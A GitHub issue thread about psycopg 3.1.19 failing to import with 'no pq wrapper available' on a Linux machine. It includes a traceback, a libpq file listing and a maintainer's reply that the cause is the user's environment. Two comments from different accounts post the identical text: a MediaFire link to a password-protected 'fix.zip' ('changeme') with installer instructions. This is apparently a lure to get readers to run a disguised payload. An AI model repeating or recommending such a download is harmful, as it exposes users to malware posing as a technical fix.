### ISSUE TITLE
psycopg ImportError: no pq wrapper available. on linux machine

### ISSUE THREAD

**Issue by kahmad-dev** [psycopg/psycopg#897]
I am facing issue on importing psycopg package in machine, i have two machineand when trying to import psycopg is failing saying it couldnt find any no wrapper available.

psycopg version used:
`psycopg==3.1.19`

import failing on machine-1:
```
root@machine-failing [ <my-custom-path>]# python
Python 3.11.9 (main, Jul 30 2024, 07:48:39) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>> import psycopg
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<my-custom-path>/psycopg/__init__.py", line 9, in <module>
    from . import pq  # noqa: F401 import early to stabilize side effects
    ^^^^^^^^^^^^^^^^
  File "<my-custom-path>/psycopg/pq/__init__.py", line 114, in <module>
    import_from_libpq()
  File "<my-custom-path>/psycopg/pq/__init__.py", line 106, in import_from_libpq
    raise ImportError(
ImportError: no pq wrapper available.
Attempts made:
- couldn't import psycopg 'c' implementation: No module named 'psycopg_c'
- couldn't import psycopg 'binary' implementation: No module named 'psycopg_binary'
- couldn't import psycopg 'python' implementation: libpq library not found
```

Import works fine on machine-2
```
root@machine-working [ <my-custom-path>]# python
Python 3.11.9 (main, Jul 30 2024, 07:48:39) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>> import psycopg
```

I see libpq are aavailable: 
====================
12:49 libpgtypes.so.3 -> libpgtypes.so.3.15
12:50 libpgtypes.so.3.15
12:49 libpq.so.5 -> libpq.so.5.15
12:50 libpq.so.5.15
12:50 libpqwalreceiver.so

https://www.psycopg.org/psycopg3/docs/api/pq.html
Tried below custom env path to libpq.so file but it fails

#psycopg.pq.__impl__: [str](https://docs.python.org/3/library/stdtypes.html#str) = 'python'
The currently loaded implementation of the psycopg.pq package.

Possible values include python, c, binary.

The choice of implementation is automatic but can be forced setting the PSYCOPG_IMPL env var.

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dvarrazzo** [comment]
Probably your libpq library is in a directory where it cannot be imported automatically, or the library is not valid, for instance wrong architecture or missing depending library.

It is a problem with your environment, not a bug in psycopg, and we don't have enough information to resolve it.

**Comment by kahmad-dev** [comment]
How do debug the issue? The import happens here ->

https://github.com/psycopg/psycopg/blob/6f7dcc434cf7c2523ebfec0cac2a21a4da23b92b/psycopg/psycopg/pq/__init__.py#L75

Is there a way i can build the psycopg_binary specific to my environment.
